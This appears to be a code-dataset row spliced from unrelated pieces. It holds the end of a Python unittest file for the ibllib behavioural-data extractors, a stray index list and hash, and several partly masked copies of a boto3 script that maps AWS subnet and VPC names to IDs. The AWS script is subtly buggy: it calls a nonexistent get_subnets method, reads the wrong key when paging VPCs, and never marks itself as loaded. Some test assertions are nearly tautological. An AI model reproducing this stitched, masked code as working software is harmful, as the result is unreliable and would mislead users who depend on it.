self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
# TRAINING SESSIONS
ft = training_trials.FeedbackTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
# BIASED SESSIONS
ft = biased_trials.FeedbackTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
# TRAINING SESSIONS
sott = training_trials.StimOnTriggerTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# -- version >= 5.0.0
sott = training_trials.StimOnTriggerTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# BIASED SESSIONS
sott = biased_trials.StimOnTriggerTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
# -- version >= 5.0.0
sott = biased_trials.StimOnTriggerTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
def test_get_stimOn_times_lt5(self):
# TRAINING SESSIONS
st = training_trials.StimOnTimes_deprecated(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnTimes_deprecated(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_get_stimOn_times_ge5(self):
# TRAINING SESSIONS
st = training_trials.StimOnTimes_deprecated(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnTimes_deprecated(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
def test_stimOnOffFreeze_times(self):
# TRAINING SESSIONS
st = training_trials.StimOnOffFreezeTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnOffFreezeTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# TRAINING SESSIONS
st = training_trials.StimOnOffFreezeTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
# BIASED SESSIONS
st = biased_trials.StimOnOffFreezeTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(st[0], np.ndarray))
def test_get_intervals(self):
# TRAINING SESSIONS
di = training_trials.Intervals(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# -- version >= 5.0.0
di = training_trials.Intervals(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# BIASED SESSIONS
di = biased_trials.Intervals(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
# -- version >= 5.0.0
di = biased_trials.Intervals(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
# TRAINING SESSIONS
rt = training_trials.ResponseTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# -- version >= 5.0.0
rt = training_trials.ResponseTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# BIASED SESSIONS
rt = biased_trials.ResponseTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
# -- version >= 5.0.0
rt = biased_trials.ResponseTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
def test_get_goCueTrigger_times(self):
# TRAINING SESSIONS
data = raw.load_data(self.training_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps']
['closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
# -- version >= 5.0.0
gct = training_trials.GoCueTriggerTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
# BIASED SESSIONS
data = raw.load_data(self.biased_lt5['path'])
gct = np.array([tr['behavior_data']['States timestamps']
['closed_loop'][0][0] for tr in data])
self.assertTrue(isinstance(gct, np.ndarray))
# -- version >= 5.0.0
gct = biased_trials.GoCueTriggerTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gct, np.ndarray))
def test_get_goCueOnset_times(self):
# TRAINING SESSIONS
gcot = training_trials.GoCueTimes(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
# -- version >= 5.0.0
gcot = training_trials.GoCueTimes(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
# BIASED SESSIONS
gcot = biased_trials.GoCueTimes(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
# -- version >= 5.0.0
gcot = biased_trials.GoCueTimes(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
# TRAINING SESSIONS
it = training_trials.IncludedTrials(
self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
# -- version >= 5.0.0
it = training_trials.IncludedTrials(
self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
# BIASED SESSIONS
it = biased_trials.IncludedTrials(
self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
# -- version >= 5.0.0
it = biased_trials.IncludedTrials(
self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
# TRAINING SESSIONS
# Expect an error raised because no wheel moves were present in test data
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(
self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception))
# -- version >= 5.0.0
out, files = training_trials.extract_all(self.training_ge5['path'], save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
# BIASED SESSIONS
# The new trials extractor additionally extracts the wheel data and this fails for the < 5.0
# test data so we will stub the wheel extractor
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = ({}, [])
out, files = biased_trials.extract_all(
self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
# -- version >= 5.0.0
out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
# TRAINING SESSIONS
# only for training?
path = self.training_lt5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
# here we test for 2 kinds of file corruption that happen
# 1/2 the first sample time is corrupt and absurdly high and should be discarded
# 2/2 2 samples are swapped and need to be swapped backk
path = self.biased_lt5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
# -- version >= 5.0.0
path = self.biased_ge5['path'] / "raw_behavior_data"
path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
# the wheel folder contains other errors in bpod output that had to be addressed
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
def test_load_encoder_events(self):
raw.load_encoder_events(self.training_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.training_ge5['path'])
raw.load_encoder_events(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_events(self.biased_ge5['path'])
def test_size_outputs(self):
# check the output dimensions
# VERSION >= 5.0.0
from ibllib.io.extractors.bpod_trials import extract_all
extract_all(self.training_ge5['path'])
trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
extract_all(self.biased_ge5['path'])
trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
# VERSION < 5.0.0
# for these test data there are no wheel moves so let's mock the output
mock_data = {
'intervals': np.array([[0, 1], ]),
'peakAmplitude': np.array([1, 1]),
'peakVelocity_times': np.array([1, 1])}
function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves'
# Training
with unittest.mock.patch(function_name, return_value=mock_data):
extract_all(self.training_lt5['path'])
trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
# Biased
with unittest.mock.patch(function_name, return_value=mock_data):
extract_all(self.biased_lt5['path'])
trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials')
self.assertTrue(alfio.check_dimensions(trials) == 0)
def tearDown(self):
for f in self.main_path.rglob('_ibl_log.*.log'):
f.unlink()
[x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()]
[x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()]
[x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()]
[x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()]
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-6, -20]) # bpod starts 20 secs before with 10 ppm drift
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + .001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) -> None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = (
"some_file.csv",
"some_file.tsv",
"some_file.ssv",
"some_file.npy",
)
var_names = (
"csv",
"ssv",
"tsv",
"npy",
)
def _extract(self, **kwargs) -> tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return (csv, ssv, tsv, npy)
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) -> None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
# self.addClassCleanup(tempdir.cleanup) # py3.8
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
# UNIT DATA
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
# Add drift
ts += np.full_like(ts, 1e-4).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.
audio = {'times': np.empty(n_pulses * 2),
'polarities': gpio['polarities']}
for p in range(n_pulses):
i = p * 2
rise = (pulse_width * p) + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
self.assertEqual(audio, audio_, 'Audio dict shouldn\'t be effected')
np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05])
# Broken TTLs + extra TTL
delay = 0.08
pulse_width = 1e-5
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
# One front shifted by a large amount
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3])))
def test_attribute_times(self, display=False):
# Create two timestamp arrays at two different frequencies
tsa = np.linspace(0, 60, 60 * 4)[:60] # 240bpm
tsb = np.linspace(0, 60, 60 * 3)[:45] # 180bpm
tsa = np.sort(np.append(tsa, .4)) # Add ambiguous front
tsb = np.sort(np.append(tsb, .41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
# Check with default args
matches = camera.attribute_times(tsa, tsb)
expected = np.array(
[0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21,
22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44,
45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
)
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
# Taking closest instead of first should change index of ambiguous front
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
# Taking first after should exclude many pulses
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20,
22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
# Lower tolerance
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
# Remove injective assert
matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest')
expected = np.array(
[0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22,
24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45,
46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
)
np.testing.assert_array_equal(matches, expected)
# Check input validation
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
if __name__ == "__main__":
unittest.main(exit=False, verbosity=2)
| [
34,
38,
40,
43,
49
] |
65 | 767c0e6d956701fcedddb153b6c47f404dec535a | <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
vpcs_list.extend(vpcs_r['Subnets'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.vpcs[name] = vpc['VpcId']
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
<mask token>
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
<mask token>
| <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
vpcs_list.extend(vpcs_r['Subnets'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.vpcs[name] = vpc['VpcId']
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
<mask token>
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| <mask token>
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
vpcs_list.extend(vpcs_r['Subnets'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.vpcs[name] = vpc['VpcId']
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| import boto3
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
vpcs_list.extend(vpcs_r['Subnets'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.vpcs[name] = vpc['VpcId']
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map(lambda x: self.subnets[x], filter(lambda x: x.
startswith(f'{environment_name}{subnetname}'), self.subnets)))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f'{environment_name}-vpc' in vpcs:
return vpcs[f'{environment_name}-vpc']
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Subnet.Public0', {'EnvironmentName': 'dev'}))
print(replace_network('CfHl.Vpc.Id', {'EnvironmentName': 'dev'}))
| import boto3
class NetworkLookup:
def __init__(self):
self.loaded = 0
self.subnets = {}
self.vpcs = {}
def load(self):
if self.loaded:
return
client = boto3.client('ec2')
# load subnets
subnets_r = client.describe_subnets()
subnets_list = subnets_r['Subnets']
while 'NextToken' in subnets_r:
subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])
subnets_list.extend(subnets_r['Subnets'])
for subnet in subnets_list:
name = None
if 'Tags' in subnet:
for tag in subnet['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.subnets[name] = subnet['SubnetId']
# load vpcs
vpcs_r = client.describe_vpcs()
vpcs_list = vpcs_r['Vpcs']
while 'NextToken' in vpcs_r:
vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])
vpcs_list.extend(vpcs_r['Subnets'])
for vpc in vpcs_list:
name = None
if 'Tags' in vpc:
for tag in vpc['Tags']:
if tag['Key'] == 'Name':
name = tag['Value']
if name is not None:
self.vpcs[name] = vpc['VpcId']
def get_subnets(self, environment_name, subnetname):
self.load()
return list(map( lambda x: self.subnets[x] ,
filter(lambda x: x.startswith(f"{environment_name}{subnetname}"), self.subnets)
))
nl = NetworkLookup()
def replace_subnets(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Subnet'):
parts = value.split('.')
if len(parts) == 3:
subnet_class = parts[2]
environment_name = parameters['EnvironmentName']
subnets = nl.get_subnets(environment_name, subnet_class)
if parts[1] == 'Subnets':
return subnets
elif parts[1] == 'Subnet':
if subnets:
return subnets[0]
return value
def replace_vpc(value, parameters):
if isinstance(value, str) and value.startswith('CfHl.Vpc'):
nl.load()
parts = value.split('.')
environment_name = parameters['EnvironmentName']
if len(parts) == 3:
prop = parts[2]
if prop == 'Id':
vpcs = nl.vpcs
if f"{environment_name}-vpc" in vpcs:
return vpcs[f"{environment_name}-vpc"]
return value
def replace_network(value, parameters):
value = replace_subnets(value, parameters)
value = replace_vpc(value, parameters)
return value
if __name__ == '__main__':
print(replace_network('CfHl.Subnets.Public',{'EnvironmentName':'dev'}))
